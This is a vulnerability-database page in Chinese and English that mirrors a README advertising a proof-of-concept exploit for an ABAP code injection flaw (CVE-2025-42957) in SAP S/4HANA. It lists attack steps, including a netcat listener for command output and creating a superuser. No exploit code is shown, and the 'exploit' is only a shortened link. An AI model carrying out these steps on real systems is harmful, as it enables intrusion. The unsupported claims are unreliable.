漏洞平台

POC详情： dfc43de9c549ded125297b1130c5da262753401d

来源

https://github.com/callinston/CVE-2025-42957

关联漏洞

标题： SAP S/4HANA 代码注入漏洞 (CVE-2025-42957)
描述：SAP S/4HANA是德国思爱普（SAP）公司的一个基于 SAP HANA 内存数据库系统的的企业资源管理软件。 SAP S/4HANA存在代码注入漏洞，该漏洞源于可通过RFC注入任意ABAP代码。

介绍

## Proof-of-Concept exploit for the ABAP Code Injection vulnerability in SAP S/4HANA (CVE-2025-42957).

### **Disclaimer**
This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

### **Technical Analysis**
The vulnerability exists within SAP S/4HANA's RFC-exposed function modules, specifically in the handling of user input parameters in the S4CORE component. This exploit targets the ABAP code processing pipeline. By crafting a malicious input string for a vulnerable function module, an attacker can inject arbitrary ABAP code, bypassing authorization checks and executing it on the server. This is achieved through improper sanitization of input data, allowing the injection of statements like user creation or system commands. The injected code runs in the context of the ABAP application server, leading to privilege escalation, data manipulation, or remote code execution on the underlying OS. The attack vector is viable through SAP GUI, custom RFC clients, or integrated systems that call the exposed modules, requiring only low-privileged authentication.

### **Usage**
The exploit is generated using a Python script. It creates a malicious RFC payload to trigger the vulnerability.
1. **Set up a listener** if planning for command execution (optional for basic tests). Netcat is a simple option:
    ```bash
    nc -lvnp 4444
    ```
2. **Generate and send the exploit payload:**
    Run the `cve-2025-42957.py` script, providing the SAP host details, credentials, and desired payload.
    ```bash
    python cve-2025-42957.py
    ```
3. **Deliver the payload.**
    The script automatically connects via RFC and injects the code. No file transfer needed; the vulnerability triggers upon function invocation.
4. **Observe the results.**
    Check the SAP system for changes (e.g., new superuser account) or monitor your listener for any OS-level command output.

### **Demo**
The following demonstration shows the exploit in action. The script is run against a test SAP instance, injecting code to create a superuser and execute a system command, resulting in immediate compromise.
`demo.mp4`

### Exploit
[href](https://tinyurl.com/37y2mrb3)

For any inquiries, please email me at: trannguyennam65@gmail.com

文件快照


 [4.0K]  /data/pocs/dfc43de9c549ded125297b1130c5da262753401d
└── [2.4K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。